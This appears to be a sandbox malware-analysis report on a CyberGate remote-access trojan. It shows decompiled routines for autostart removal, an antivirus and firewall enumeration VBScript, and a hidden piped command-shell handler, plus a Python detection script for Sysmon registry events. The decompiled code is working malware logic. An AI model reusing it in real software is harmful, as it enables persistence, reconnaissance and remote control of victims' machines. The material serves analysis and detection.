                                    					RegOpenKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t97);
                                    					_t68 =  *0x2405abd0; // 0x2405b900
                                    					RegDeleteValueA( *_t97, E24013534( *_t68));
                                    					RegCloseKey( *_t97);
                                    				}
                                    				_t31 =  *0x2405ab8c; // 0x2405b8f4
                                    				if( *_t31 != 0) {
                                    					RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, _t97);
                                    					_t44 =  *0x2405ab8c; // 0x2405b8f4
                                    					RegDeleteKeyA( *_t97, E24013534( *_t44));
                                    					RegCloseKey( *_t97);
                                    					RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, _t97);
                                    					_t52 =  *0x2405ab8c; // 0x2405b8f4
                                    					RegDeleteKeyA( *_t97, E24013534( *_t52));
                                    					RegCloseKey( *_t97);
                                    				}
                                    				RegOpenKeyExA(0x80000001, "Software\\", 0, 0x20006, _t97);
                                    				_t33 =  *0x2405aba4; // 0x2405b8d8
                                    				RegDeleteKeyA( *_t97, E24013534( *_t33));
                                    				RegCloseKey( *_t97);
                                    				_pop(_t105);
                                    				 *[fs:eax] = _t105;
                                    				_push(0x2404488c);
                                    				return E240130AC( &_v16, 2);
                                    			}
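The decompiled routine E24044638 above is the sample's self-removal path: it closes its handles, resets the dropped file's attributes, and then deletes the autostart entries it had planted, as values under HKLM and HKCU `Software\Microsoft\Windows\CurrentVersion\Run` and `...\Policies\Explorer\Run` (RegDeleteValueA), as whole component keys under `Software\Microsoft\Active Setup\Installed Components` (RegDeleteKeyA), and finally its own configuration key under HKCU `Software\` whose name is not shown here. The same three locations are what a detection engineer would watch for when the RAT installs. The following is an added example, not part of the Joe Sandbox report or the sample's code: it classifies registry paths in the notation Sysmon uses in its registry events (Event ID 12/13/14 `TargetObject`) against exactly those keys, and runs over a handful of constructed sample events. The key list comes from the RegOpenKey/RegOpenKeyEx calls in the listing; the value names, SID and GUID in the sample events are made up. One caveat the code handles: Sysmon logs per-user hives as `HKU\<SID>\...`, never as `HKCU`, so a rule that looks for the literal prefix `HKCU` misses every entry the sample writes via root handle 0x80000001.

```python
"""Classify registry paths against the autostart locations that the
CyberGate uninstall routine E24044638 (decompiled above) cleans up.

Added example, not part of the sandbox report or the sample. The events
below are constructed to look like Sysmon registry events (EventID 12 =
key create/delete, 13 = value set, 14 = rename) with TargetObject in
Sysmon's HKLM\\... / HKU\\<SID>\\... notation.
"""
import re

# Autostart keys taken from the RegOpenKeyA / RegOpenKeyExA calls in the
# listing. The sample removes Run entries per value (RegDeleteValueA) and
# Active Setup entries per component key (RegDeleteKeyA); for detection we
# report the first path component after the key in both cases.
AUTOSTART_KEYS = {
    r"software\microsoft\windows\currentversion\run": "Run",
    r"software\microsoft\windows\currentversion\policies\explorer\run": "Policies Explorer Run",
    r"software\microsoft\active setup\installed components": "Active Setup",
}

# Sysmon writes per-user hives as HKU\S-1-5-...\ (optionally _Classes).
_SID_RE = re.compile(r"^hku\\s-1-5-[\d-]+(?:_classes)?\\", re.I)


def normalize_hive(path):
    """Return (hive, rest): HKLM/HKEY_LOCAL_MACHINE fold to 'HKLM';
    HKCU, HKEY_CURRENT_USER and HKU\\<SID> all fold to 'HKU'.
    Unknown roots yield ('', path)."""
    p = path.strip().strip("\\")
    low = p.lower()
    m = _SID_RE.match(low)
    if m:
        return "HKU", p[m.end():]
    for prefix in ("hkey_local_machine\\", "hklm\\"):
        if low.startswith(prefix):
            return "HKLM", p[len(prefix):]
    for prefix in ("hkey_current_user\\", "hkcu\\"):
        if low.startswith(prefix):
            return "HKU", p[len(prefix):]
    return "", p


def classify_autostart(target_object):
    """Return (hive, category, name) when target_object names an entry
    under one of the sample's autostart keys, else None. `name` is the Run
    value name, or the Active Setup component sub-key (so a write to
    ...\\{GUID}\\StubPath is attributed to {GUID}). The bare key itself,
    with no entry beneath it, is not reported."""
    hive, rest = normalize_hive(target_object)
    if not hive:
        return None
    low = rest.lower()
    for key, category in AUTOSTART_KEYS.items():
        if low.startswith(key + "\\"):
            name = rest[len(key) + 1:].split("\\", 1)[0]
            if name:
                return hive, category, name
    return None


def find_autostart_events(events):
    """Return [(EventID, hive, category, name)] for every event whose
    TargetObject is an autostart entry."""
    hits = []
    for ev in events:
        c = classify_autostart(ev["TargetObject"])
        if c:
            hits.append((ev["EventID"],) + c)
    return hits


# Constructed sample events (not taken from the report). The SID, value
# names and GUID are invented for illustration.
_USER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
_GUID = "{2F4C8A1E-7B3D-4E55-9A61-0C2D3E4F5A6B}"
SAMPLE_EVENTS = [
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost"},
    {"EventID": 13, "TargetObject": r"HKU\%s\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Policies" % _USER_SID},
    {"EventID": 12, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\%s" % _GUID},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\%s\StubPath" % _GUID},
    # Not among the keys this sample uses; must not be reported.
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\foo"},
    # Bare key open/create with no entry beneath it; must not be reported.
    {"EventID": 12, "TargetObject": r"HKU\%s\Software\Microsoft\Windows\CurrentVersion\Run" % _USER_SID},
]

if __name__ == "__main__":
    for hit in find_autostart_events(SAMPLE_EVENTS):
        print("EventID %d  %s  %-22s %s" % hit)
```

Prefix matching on the normalized path is deliberate: `...\CurrentVersion\Run\` does not match `RunOnce`, and folding HKCU and `HKU\<SID>` to one hive keeps a single rule for both the 0x80000001 and 0x80000002 writes the sample performs. The sample's own configuration key under HKCU `Software\` is not included because its name does not appear in this listing.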



                                    0x24044638
                                    0x24044638
                                    0x2404463b
                                    0x2404463d
                                    0x2404463f
                                    0x24044642
                                    0x24044647
                                    0x24044648
                                    0x2404464d
                                    0x24044650
                                    0x24044653
                                    0x24044663
                                    0x24044675
                                    0x2404467a
                                    0x24044680
                                    0x24044682
                                    0x24044689
                                    0x24044690
                                    0x24044697
                                    0x2404469e
                                    0x240446a5
                                    0x240446a5
                                    0x240446aa
                                    0x240446b2
                                    0x240446b7
                                    0x240446bf
                                    0x240446cc
                                    0x240446d3
                                    0x240446e1
                                    0x240446e6
                                    0x240446ed
                                    0x240446f2
                                    0x240446fa
                                    0x24044707
                                    0x2404470c
                                    0x2404471c
                                    0x24044724
                                    0x24044724
                                    0x24044729
                                    0x24044731
                                    0x2404473e
                                    0x24044743
                                    0x24044753
                                    0x2404475b
                                    0x2404475b
                                    0x24044760
                                    0x24044768
                                    0x24044775
                                    0x2404477a
                                    0x2404478a
                                    0x24044792
                                    0x240447a2
                                    0x240447a7
                                    0x240447b7
                                    0x240447bf
                                    0x240447bf
                                    0x240447c4
                                    0x240447cc
                                    0x240447e0
                                    0x240447e5
                                    0x240447f5
                                    0x240447fd
                                    0x24044814
                                    0x24044819
                                    0x24044829
                                    0x24044831
                                    0x24044831
                                    0x24044848
                                    0x2404484d
                                    0x2404485d
                                    0x24044865
                                    0x2404486c
                                    0x2404486f
                                    0x24044872
                                    0x24044884

                                    APIs
                                      • Part of subcall function 24014F18: CreateMutexA.KERNEL32(?,?,?,?,24038D32,00000000,00000000,00000000,00000000,?,00001388,?,24038DFC,?,24038DFC,?), ref: 24014F2E
                                    • Sleep.KERNEL32(00000064,00000000,00000000,00000000,00000000,24044885,?,?,00000000,00000000,00000000), ref: 24044697
                                    • CloseHandle.KERNEL32(00000480,00000000,00000000,00000000,00000000,24044885,?,?,00000000,00000000,00000000), ref: 240446B2
                                    • CloseHandle.KERNEL32(0000044C,00000480,00000000,00000000,00000000,00000000,24044885,?,?,00000000,00000000,00000000), ref: 240446BF
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885,?,?,00000000,00000000,00000000), ref: 240446E1
                                    • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 24044707
                                    • RegDeleteValueA.ADVAPI32(00000000,00000000,80000002,Software\Microsoft\Windows\CurrentVersion\Run,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 2404471C
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000002,Software\Microsoft\Windows\CurrentVersion\Run,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 24044724
                                    • RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 2404473E
                                    • RegDeleteValueA.ADVAPI32(00000000,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Run,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 24044753
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Run,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 2404475B
                                    • RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?), ref: 24044775
                                    • RegDeleteValueA.ADVAPI32(00000000,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 2404478A
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 24044792
                                    • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?), ref: 240447A2
                                    • RegDeleteValueA.ADVAPI32(00000000,00000000,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,00000000,00000000,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,00000000,00000080,0000044C,00000480,00000000), ref: 240447B7
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,00000000,00000000,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,00000000,00000080,0000044C,00000480), ref: 240447BF
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 240447E0
                                    • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 240447F5
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000002,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000), ref: 240447FD
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,00000000,00000000,00000000,80000002,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,00000000,00000080,0000044C), ref: 24044814
                                    • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 24044829
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,00000000,00000000,00000000,80000002,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?), ref: 24044831
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\,00000000,00020006,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 24044848
                                    • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 2404485D
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000001,Software\,00000000,00020006,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000), ref: 24044865
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Close$DeleteOpen$Value$Handle$AttributesCreateFileMutexSleep
                                    • String ID: Software\$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion\Run$_SAIR$exit
                                    • API String ID: 2709957979-2341067361
                                    • Opcode ID: dc3129e25bcdf7b1c0bbcf1e9856246a0916edff4244738f263365ee2bfc2926
                                    • Instruction ID: 5e640f0085d2632f4d117ca1ef2da3e7ed95ec18ad49d22feea3c632715398a7
                                    • Opcode Fuzzy Hash: dc3129e25bcdf7b1c0bbcf1e9856246a0916edff4244738f263365ee2bfc2926
                                    • Instruction Fuzzy Hash: CB51BDB4A00254AFF700EFA9D9C5F1A77EDFB29748F500474B508EB259CA78A9C48B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E24020C08(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v16;
                                    				long _v20;
                                    				intOrPtr _v68;
                                    				char _v480;
                                    				struct tagMSG _v508;
                                    				char _v512;
                                    				char _v516;
                                    				void* _v520;
                                    				char _v524;
                                    				intOrPtr _v528;
                                    				char _v532;
                                    				char _v536;
                                    				char _v540;
                                    				intOrPtr _v544;
                                    				char _v548;
                                    				char _v552;
                                    				char _v556;
                                    				char _v560;
                                    				void* _t154;
                                    				void* _t160;
                                    				void* _t172;
                                    				void* _t176;
                                    				void* _t187;
                                    				long _t192;
                                    				void* _t194;
                                    				void* _t245;
                                    				void* _t249;
                                    				intOrPtr* _t259;
                                    				void* _t260;
                                    				intOrPtr _t296;
                                    				intOrPtr* _t321;
                                    				intOrPtr* _t325;
                                    				intOrPtr* _t326;
                                    
                                    				_t325 = _t326;
                                    				_t260 = 0x45;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t260 = _t260 - 1;
                                    					_t327 = _t260;
                                    				} while (_t260 != 0);
                                    				_push(_t260);
                                    				_push(__ebx);
                                    				_t259 = __edx;
                                    				_t321 = __eax;
                                    				_t323 =  &_v480;
                                    				_push(_t325);
                                    				_push(0x24021156);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t326;
                                    				E24017038( &_v512);
                                    				E24013388( &_v12, "teste.vbs", _v512);
                                    				E24017038( &_v516);
                                    				_t262 = "teste.txt";
                                    				E24013388( &_v16, "teste.txt", _v516);
                                    				E240119B8( &_v480, _v12, _t327);
                                    				E24011428(E24011754());
                                    				E24011428(E240122A0(E24013720(), "teste.txt"));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				_push("Set objFile = objFileSystem.CreateTextFile(\"");
                                    				_push(_v16);
                                    				_push("\", True)");
                                    				E240133FC();
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E240122A0(E24013720(), _t262));
                                    				E24011428(E24011B50(_t323));
                                    				E24016F20( &_v524, _t259, _t327);
                                    				E24013344( &_v524, "cscript.exe");
                                    				_t154 = E24016C78(_v524, _t259, _t327);
                                    				_t328 = _t154;
                                    				if(_t154 == 0) {
                                    					E24016FAC( &_v540, _t259, __eflags);
                                    					E24013344( &_v540, "cscript.exe");
                                    					_t160 = E24016C78(_v540, _t259, __eflags);
                                    					__eflags = _t160;
                                    					if(_t160 == 0) {
                                    						E24013088(_t321);
                                    						E24013088(_t259);
                                    						goto L21;
                                    					}
                                    					_push(0x2402155c);
                                    					_push(_v12);
                                    					_push(0x2402155c);
                                    					E240133FC();
                                    					_t172 = E24013534(_v544);
                                    					E24016588(_v12, _t259,  &_v548, _t321, _t323, __eflags);
                                    					_t176 = E24013534(_v548);
                                    					E24016FAC( &_v552, _t259, __eflags);
                                    					E24013344( &_v552, "cscript.exe");
                                    					E240166E4(0, E24013534(_v552), 0x24021560, 0, _t176, _t172);
                                    					goto L7;
                                    				} else {
                                    					_push(0x2402155c);
                                    					_push(_v12);
                                    					_push(0x2402155c);
                                    					E240133FC();
                                    					_t245 = E24013534(_v528);
                                    					E24016588(_v12, _t259,  &_v532, _t321, _t323, _t328);
                                    					_t249 = E24013534(_v532);
                                    					E24016F20( &_v536, _t259, _t328);
                                    					E24013344( &_v536, "cscript.exe");
                                    					E240166E4(0, E24013534(_v536), 0x24021560, 0, _t249, _t245);
                                    					L7:
                                    					_v20 = GetTickCount();
                                    					while(1) {
                                    						_t187 = E24016C78(_v16, _t259, _t328);
                                    						_t329 = _t187;
                                    						if(_t187 != 0) {
                                    							break;
                                    						}
                                    						TranslateMessage( &_v508);
                                    						DispatchMessageA( &_v508);
                                    						_t192 = GetTickCount();
                                    						_push(0);
                                    						_push(_t192);
                                    						_t194 = _v20 + 0x1388;
                                    						asm("cdq");
                                    						__eflags = 0 - _v68;
                                    						if(__eflags != 0) {
                                    							if(__eflags >= 0) {
                                    								continue;
                                    							}
                                    							L12:
                                    							E24013088(_t321);
                                    							E24013088(_t259);
                                    							L21:
                                    							_pop(_t296);
                                    							 *[fs:eax] = _t296;
                                    							_push(0x2402115d);
                                    							E240130AC( &_v560, 0xd);
                                    							return E240130AC( &_v16, 3);
                                    						}
                                    						__eflags = _t194 -  *_t326;
                                    						if(__eflags >= 0) {
                                    							continue;
                                    						}
                                    						goto L12;
                                    					}
                                    					Sleep(0x64);
                                    					DeleteFileA(E24013534(_v12));
                                    					E24013088(_t321);
                                    					E24013088(_t259);
                                    					E240119B8(_t323, _v16, _t329);
                                    					E24011428(E24011748());
                                    					while(E24011428(E24011C1C(_t323)) == 0) {
                                    						E24011E54(_t323,  &_v8, __eflags);
                                    						E24011428(E24011EC0(_t323));
                                    						E24013590(_v8, 1, 1,  &_v556);
                                    						E24013480(_v556, 0x24021570);
                                    						if(__eflags != 0) {
                                    							E24013590(_v8, 1, 1,  &_v560);
                                    							E24013480(_v560, 0x24021588);
                                    							if(__eflags == 0) {
                                    								E240135D0( &_v8, 4, 1);
                                    								_push( *_t321);
                                    								_push(_v8);
                                    								_push(" / ");
                                    								E240133FC();
                                    							}
                                    						} else {
                                    							E240135D0( &_v8, 4, 1);
                                    							_push( *_t259);
                                    							_push(_v8);
                                    							_push(" / ");
                                    							E240133FC();
                                    						}
                                    					}
                                    					E24011428(E24011B50(_t323));
                                    					DeleteFileA(E24013534(_v16));
                                    					goto L21;
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 24016C78: FindFirstFileA.KERNEL32(00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CAD
                                      • Part of subcall function 24016C78: FindClose.KERNEL32(00000000,00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CB8
                                    • GetTickCount.KERNEL32 ref: 24020F9B
                                    • TranslateMessage.USER32(?), ref: 24020FAC
                                    • DispatchMessageA.USER32(?), ref: 24020FB8
                                    • GetTickCount.KERNEL32 ref: 24020FBD
                                    • Sleep.KERNEL32(00000064,00000000,00000000,00000000,2402155C,?,2402155C,", True),?,Set objFile = objFileSystem.CreateTextFile(",00000000,24021156), ref: 24021003
                                    • DeleteFileA.KERNEL32(00000000,00000064,00000000,00000000,00000000,2402155C,?,2402155C,", True),?,Set objFile = objFileSystem.CreateTextFile(",00000000,24021156), ref: 24021011
                                    • DeleteFileA.KERNEL32(00000000, / ,?,?,?,?,00000000,00000064,00000000,00000000,00000000,2402155C,?,2402155C,", True),?), ref: 24021126
                                      • Part of subcall function 240166E4: LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA,?,?,?,?,2404546A,00000000,00000000,2404E32C,2404E184,?,2404E184,?,?,2404E2A0), ref: 240166FA
                                      • Part of subcall function 240166E4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 24016700
                                      • Part of subcall function 240166E4: ShellExecuteA.SHELL32(00000000,open,00000000,00000000,?,?,00000000,shell32.dll,ShellExecuteA,?,?,?,?,2404546A,00000000,00000000), ref: 24016714
                                    Strings
                                    • / , xrefs: 24021097, 240210EC
                                    • Info = Info & "A" & CountAV & ") " & objAntiVirus.displayName & " v" & objAntiVirus.versionNumber & Enter, xrefs: 24020DD7
                                    • objFile.Close, xrefs: 24020E19
                                    • Info = Info & "F" & CountFw & ") " & objFirewall.displayName & " v" & objFirewall.versionNumber & Enter, xrefs: 24020D7F
                                    • Enter = Chr(13) + Chr(10), xrefs: 24020D11
                                    • Next, xrefs: 24020D95, 24020DED
                                    • For Each objAntiVirus In colAntiVirus, xrefs: 24020DAB
                                    • CountFW = 0, xrefs: 24020D27
                                    • Set objSecurityCenter = GetObject("winmgmts:\\.\root\SecurityCenter"), xrefs: 24020C85
                                    • For Each objFirewall In colFirewall, xrefs: 24020D53
                                    • cscript.exe, xrefs: 24020E4C, 24020EBB, 24020EF4, 24020F63
                                    • teste.vbs, xrefs: 24020C47
                                    • CountAV = 0, xrefs: 24020D3D
                                    • CountFW = CountFW + 1, xrefs: 24020D69
                                    • Set colFirewall = objSecurityCenter.ExecQuery("Select * From FirewallProduct",,48), xrefs: 24020C9B
                                    • open, xrefs: 24020ED2, 24020F7A
                                    • CountAV = CountAV + 1, xrefs: 24020DC1
                                    • ", True), xrefs: 24020CE5
                                    • Set objFile = objFileSystem.CreateTextFile(", xrefs: 24020CDD
                                    • Set objFileSystem = CreateObject("Scripting.fileSystemObject"), xrefs: 24020CC7
                                    • objFile.WriteLine(Info), xrefs: 24020E03
                                    • Set colAntiVirus = objSecurityCenter.ExecQuery("Select * From AntiVirusProduct",,48), xrefs: 24020CB1
                                    • teste.txt, xrefs: 24020C65
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CountDeleteFindMessageTick$AddressCloseDispatchExecuteFirstLibraryLoadProcShellSleepTranslate
                                    • String ID: / $", True)$CountAV = 0$CountAV = CountAV + 1$CountFW = 0$CountFW = CountFW + 1$Enter = Chr(13) + Chr(10)$For Each objAntiVirus In colAntiVirus$For Each objFirewall In colFirewall$Info = Info & "A" & CountAV & ") " & objAntiVirus.displayName & " v" & objAntiVirus.versionNumber & Enter$Info = Info & "F" & CountFw & ") " & objFirewall.displayName & " v" & objFirewall.versionNumber & Enter$Next$Set colAntiVirus = objSecurityCenter.ExecQuery("Select * From AntiVirusProduct",,48)$Set colFirewall = objSecurityCenter.ExecQuery("Select * From FirewallProduct",,48)$Set objFile = objFileSystem.CreateTextFile("$Set objFileSystem = CreateObject("Scripting.fileSystemObject")$Set objSecurityCenter = GetObject("winmgmts:\\.\root\SecurityCenter")$cscript.exe$objFile.Close$objFile.WriteLine(Info)$open$teste.txt$teste.vbs
                                    • API String ID: 1377169233-372987553
                                    • Opcode ID: 901dab5ed5f145dd9e9afbd9afa80121167d4862e4d1124387e60d0a0e373244
                                    • Instruction ID: bf1dced404bf5cd9e404b06ec0a5ac9f1155fabc5fe773b5284b026e0068bf22
                                    • Opcode Fuzzy Hash: 901dab5ed5f145dd9e9afbd9afa80121167d4862e4d1124387e60d0a0e373244
                                    • Instruction Fuzzy Hash: CFC14374B0051957FF13F7A49C80A8E66A6AF6964CF9044A5E00CBF68CCE74DFC24B66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			E24037E60(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                    				void* _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				long _v24;
                                    				long _v28;
                                    				long _v32;
                                    				long _v36;
                                    				char _v40;
                                    				char _v44;
                                    				long _v48;
                                    				void _v32817;
                                    				struct _SECURITY_ATTRIBUTES _v32832;
                                    				struct _STARTUPINFOA _v32900;
                                    				struct _PROCESS_INFORMATION _v32916;
                                    				char _v33177;
                                    				char _v33184;
                                    				void* _t66;
                                    				long _t122;
                                    				long _t128;
                                    				void* _t153;
                                    				intOrPtr _t163;
                                    				intOrPtr _t169;
                                    				void* _t174;
                                    				void* _t175;
                                    				void* _t177;
                                    				void* _t178;
                                    				intOrPtr _t179;
                                    
                                    				_t177 = _t178;
                                    				_push(__eax);
                                    				_t66 = 8;
                                    				do {
                                    					_t178 = _t178 + 0xfffff004;
                                    					_push(_t66);
                                    					_t66 = _t66 - 1;
                                    				} while (_t66 != 0);
                                    				_t179 = _t178 + 0xfffffe68;
                                    				_v33184 = 0;
                                    				_v40 = 0;
                                    				_v44 = 0;
                                    				_push(_t177);
                                    				_push(0x2403815b);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t179;
                                    				E240130DC(0x2405ca48, "shellresposta|shellativar|");
                                    				CreateThread(0, 0, E24037D20, 0, 0,  &_v48);
                                    				_v32832.nLength = 0xc;
                                    				_v32832.lpSecurityDescriptor = 0;
                                    				_v32832.bInheritHandle = 0xffffffff;
                                    				CreatePipe( &_v8,  &_v16,  &_v32832, 0);
                                    				CreatePipe( &_v12,  &_v20,  &_v32832, 0);
                                    				GetStartupInfoA( &_v32900);
                                    				_v32900.hStdOutput = _v20;
                                    				_v32900.hStdError = _v20;
                                    				_v32900.hStdInput = _v8;
                                    				_v32900.dwFlags = 0x101;
                                    				_v32900.wShowWindow = 0;
                                    				GetEnvironmentVariableA("COMSPEC",  &_v33177, 0x105);
                                    				CreateProcessA(0,  &_v33177, 0, 0, 0xffffffff, 0x10, 0, 0,  &_v32900,  &_v32916);
                                    				CloseHandle(_v20);
                                    				CloseHandle(_v8);
                                    				_v36 = 1;
                                    				SetNamedPipeHandleState(_v12,  &_v36, 0, 0);
                                    				while(1) {
                                    					Sleep(0xa);
                                    					GetExitCodeProcess(_v32916.hProcess,  &_v32);
                                    					if(_v32 != 0x103) {
                                    						break;
                                    					}
                                    					_t122 =  *0x2405aa4c; // 0x1000
                                    					ReadFile(_v12,  &_v32817, _t122,  &_v24, 0);
                                    					if(_v24 <= 0) {
                                    						if(_v44 != 0) {
                                    							E24013388( &_v40, _v44, "shellresposta|shellresposta|");
                                    							_push(_t177);
                                    							_push(0x2403807a);
                                    							_push( *[fs:eax]);
                                    							 *[fs:eax] = _t179;
                                    							E240130DC(0x2405ca48, _v40);
                                    							CreateThread(0, 0, E24037D20, 0, 0,  &_v48);
                                    							_pop(_t169);
                                    							 *[fs:eax] = _t169;
                                    							E24013088( &_v44);
                                    						}
                                    						L12:
                                    						if( *0x2405ca44 != 0) {
                                    							_t128 = E2401333C( *0x2405ca44);
                                    							WriteFile(_v16, E24013534( *0x2405ca44), _t128,  &_v28, 0);
                                    							WriteFile(_v16, 0x240381c8, 2,  &_v28, 0);
                                    							E24013088(0x2405ca44);
                                    						}
                                    						continue;
                                    					}
                                    					_t174 = _v24 - 1;
                                    					if(_t174 < 0) {
                                    						goto L12;
                                    					}
                                    					_t175 = _t174 + 1;
                                    					_t153 =  &_v32817;
                                    					do {
                                    						E24013264();
                                    						E24013344( &_v44, _v33184);
                                    						_t153 = _t153 + 1;
                                    						_t175 = _t175 - 1;
                                    					} while (_t175 != 0);
                                    					goto L12;
                                    				}
                                    				GetExitCodeProcess(_v32916.hProcess,  &_v32);
                                    				if(_v32 == 0x103) {
                                    					TerminateProcess(_v32916, 0);
                                    				}
                                    				CloseHandle(_v12);
                                    				CloseHandle(_v16);
                                    				E24013120( &_v40, "shellresposta|shelldesativar|");
                                    				E240130DC(0x2405ca48, _v40);
                                    				E24037D20();
                                    				_pop(_t163);
                                    				 *[fs:eax] = _t163;
                                    				_push(0x24038162);
                                    				E24013088( &_v33184);
                                    				return E240130AC( &_v44, 2);
                                    			}

                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00027D20,00000000,00000000,?), ref: 24037EC0
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 24037EF2
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,0000000C,00000000), ref: 24037F08
                                    • GetStartupInfoA.KERNEL32(?), ref: 24037F14
                                    • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000105,?,?,0000000C,00000000,?,?,0000000C,00000000), ref: 24037F58
                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,000000FF,00000010,00000000,00000000,?,?,COMSPEC,?,00000105,?,?,0000000C), ref: 24037F80
